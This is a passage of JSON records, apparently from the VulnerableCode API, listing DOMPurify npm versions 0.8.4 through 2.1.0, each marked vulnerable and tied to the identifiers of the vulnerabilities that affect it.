"VCID-ttsq-pq54-g7fg" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@0.8.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/193689?format=api", "purl": "pkg:npm/dompurify@0.8.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-4qke-xfet-xue6" }, { "vulnerability": "VCID-9517-d2c6-9fhx" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-prz4-pcsj-gfh2" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-ttsq-pq54-g7fg" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@0.8.5" }, { "url": "http://public2.vulnerablecode.io/api/packages/193690?format=api", "purl": "pkg:npm/dompurify@0.8.6", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-4qke-xfet-xue6" }, { "vulnerability": "VCID-9517-d2c6-9fhx" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-prz4-pcsj-gfh2" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-ttsq-pq54-g7fg" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@0.8.6" }, { "url": "http://public2.vulnerablecode.io/api/packages/193691?format=api", "purl": "pkg:npm/dompurify@0.8.7", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-4qke-xfet-xue6" }, { "vulnerability": "VCID-9517-d2c6-9fhx" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-prz4-pcsj-gfh2" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-ttsq-pq54-g7fg" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@0.8.7" }, { "url": "http://public2.vulnerablecode.io/api/packages/193692?format=api", "purl": "pkg:npm/dompurify@0.8.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-4qke-xfet-xue6" }, { "vulnerability": "VCID-9517-d2c6-9fhx" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-prz4-pcsj-gfh2" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-ttsq-pq54-g7fg" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@0.8.8" }, { "url": "http://public2.vulnerablecode.io/api/packages/193693?format=api", "purl": "pkg:npm/dompurify@0.8.9", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-4qke-xfet-xue6" }, { "vulnerability": "VCID-9517-d2c6-9fhx" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-prz4-pcsj-gfh2" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-ttsq-pq54-g7fg" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@0.8.9" }, { "url": "http://public2.vulnerablecode.io/api/packages/193694?format=api", "purl": "pkg:npm/dompurify@0.9.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-4qke-xfet-xue6" }, { "vulnerability": "VCID-9517-d2c6-9fhx" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-prz4-pcsj-gfh2" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-ttsq-pq54-g7fg" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@0.9.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/193695?format=api", "purl": "pkg:npm/dompurify@1.0.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-4qke-xfet-xue6" }, { "vulnerability": "VCID-9517-d2c6-9fhx" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-prz4-pcsj-gfh2" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-ttsq-pq54-g7fg" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@1.0.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/193696?format=api", "purl": "pkg:npm/dompurify@1.0.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-4qke-xfet-xue6" }, { "vulnerability": "VCID-9517-d2c6-9fhx" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-prz4-pcsj-gfh2" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-ttsq-pq54-g7fg" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@1.0.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/193697?format=api", "purl": "pkg:npm/dompurify@1.0.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-4qke-xfet-xue6" }, { "vulnerability": "VCID-9517-d2c6-9fhx" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-prz4-pcsj-gfh2" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-ttsq-pq54-g7fg" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@1.0.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/193698?format=api", "purl": "pkg:npm/dompurify@1.0.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-4qke-xfet-xue6" }, { "vulnerability": "VCID-9517-d2c6-9fhx" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-prz4-pcsj-gfh2" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-ttsq-pq54-g7fg" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@1.0.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/193699?format=api", "purl": "pkg:npm/dompurify@1.0.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-4qke-xfet-xue6" }, { "vulnerability": "VCID-9517-d2c6-9fhx" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-prz4-pcsj-gfh2" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-ttsq-pq54-g7fg" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@1.0.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/193700?format=api", "purl": "pkg:npm/dompurify@1.0.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-4qke-xfet-xue6" }, { "vulnerability": "VCID-9517-d2c6-9fhx" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-prz4-pcsj-gfh2" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-ttsq-pq54-g7fg" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@1.0.5" }, { "url": "http://public2.vulnerablecode.io/api/packages/193701?format=api", "purl": "pkg:npm/dompurify@1.0.6", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-4qke-xfet-xue6" }, { "vulnerability": "VCID-9517-d2c6-9fhx" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-prz4-pcsj-gfh2" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-ttsq-pq54-g7fg" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@1.0.6" }, { "url": "http://public2.vulnerablecode.io/api/packages/193702?format=api", "purl": "pkg:npm/dompurify@1.0.7", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-4qke-xfet-xue6" }, { "vulnerability": "VCID-9517-d2c6-9fhx" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-prz4-pcsj-gfh2" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-ttsq-pq54-g7fg" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@1.0.7" }, { "url": "http://public2.vulnerablecode.io/api/packages/193703?format=api", "purl": "pkg:npm/dompurify@1.0.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-4qke-xfet-xue6" }, { "vulnerability": "VCID-9517-d2c6-9fhx" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-prz4-pcsj-gfh2" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-ttsq-pq54-g7fg" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@1.0.8" }, { "url": "http://public2.vulnerablecode.io/api/packages/193704?format=api", "purl": "pkg:npm/dompurify@1.0.9", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-4qke-xfet-xue6" }, { "vulnerability": "VCID-9517-d2c6-9fhx" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-prz4-pcsj-gfh2" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-ttsq-pq54-g7fg" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@1.0.9" }, { "url": "http://public2.vulnerablecode.io/api/packages/193705?format=api", "purl": "pkg:npm/dompurify@1.0.10", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-4qke-xfet-xue6" }, { "vulnerability": "VCID-8y7q-v1h7-b7hd" }, { "vulnerability": "VCID-9517-d2c6-9fhx" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-prz4-pcsj-gfh2" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-ttsq-pq54-g7fg" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@1.0.10" }, { "url": "http://public2.vulnerablecode.io/api/packages/61110?format=api", "purl": "pkg:npm/dompurify@1.0.11", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-9517-d2c6-9fhx" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-prz4-pcsj-gfh2" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-ttsq-pq54-g7fg" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@1.0.11" }, { "url": "http://public2.vulnerablecode.io/api/packages/193706?format=api", "purl": "pkg:npm/dompurify@2.0.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-9517-d2c6-9fhx" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-prz4-pcsj-gfh2" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-ttsq-pq54-g7fg" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.0.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/193707?format=api", "purl": "pkg:npm/dompurify@2.0.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-9517-d2c6-9fhx" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-prz4-pcsj-gfh2" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.0.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/216441?format=api", "purl": "pkg:npm/dompurify@2.0.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-9517-d2c6-9fhx" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-prz4-pcsj-gfh2" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.0.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/73161?format=api", "purl": "pkg:npm/dompurify@2.0.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-9517-d2c6-9fhx" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-prz4-pcsj-gfh2" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.0.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/216442?format=api", "purl": "pkg:npm/dompurify@2.0.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-9517-d2c6-9fhx" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-prz4-pcsj-gfh2" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.0.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/216443?format=api", "purl": "pkg:npm/dompurify@2.0.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-9517-d2c6-9fhx" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-prz4-pcsj-gfh2" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.0.5" }, { "url": "http://public2.vulnerablecode.io/api/packages/216444?format=api", "purl": "pkg:npm/dompurify@2.0.6", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-9517-d2c6-9fhx" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-prz4-pcsj-gfh2" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.0.6" }, { "url": "http://public2.vulnerablecode.io/api/packages/72913?format=api", "purl": "pkg:npm/dompurify@2.0.7", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-prz4-pcsj-gfh2" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.0.7" }, { "url": "http://public2.vulnerablecode.io/api/packages/216445?format=api", "purl": "pkg:npm/dompurify@2.0.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-prz4-pcsj-gfh2" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.0.8" }, { "url": "http://public2.vulnerablecode.io/api/packages/216446?format=api", "purl": "pkg:npm/dompurify@2.0.9", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-prz4-pcsj-gfh2" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.0.9" }, { "url": "http://public2.vulnerablecode.io/api/packages/216447?format=api", "purl": "pkg:npm/dompurify@2.0.10", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-prz4-pcsj-gfh2" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.0.10" }, { "url": "http://public2.vulnerablecode.io/api/packages/216448?format=api", "purl": "pkg:npm/dompurify@2.0.11", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-prz4-pcsj-gfh2" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.0.11" }, { "url": "http://public2.vulnerablecode.io/api/packages/216449?format=api", "purl": "pkg:npm/dompurify@2.0.12", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-prz4-pcsj-gfh2" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.0.12" }, { "url": "http://public2.vulnerablecode.io/api/packages/216450?format=api", "purl": "pkg:npm/dompurify@2.0.13", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-prz4-pcsj-gfh2" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.0.13" }, { "url": "http://public2.vulnerablecode.io/api/packages/216451?format=api", "purl": "pkg:npm/dompurify@2.0.14", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-prz4-pcsj-gfh2" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.0.14" }, { "url": "http://public2.vulnerablecode.io/api/packages/216452?format=api", "purl": "pkg:npm/dompurify@2.0.15", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-prz4-pcsj-gfh2" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.0.15" }, { "url": "http://public2.vulnerablecode.io/api/packages/216453?format=api", "purl": "pkg:npm/dompurify@2.0.16", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-prz4-pcsj-gfh2" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.0.16" }, { "url": "http://public2.vulnerablecode.io/api/packages/73071?format=api", "purl": "pkg:npm/dompurify@2.0.17", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.0.17" }, { "url": "http://public2.vulnerablecode.io/api/packages/708288?format=api", "purl": "pkg:npm/dompurify@2.1.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.1.0" }, { "url": 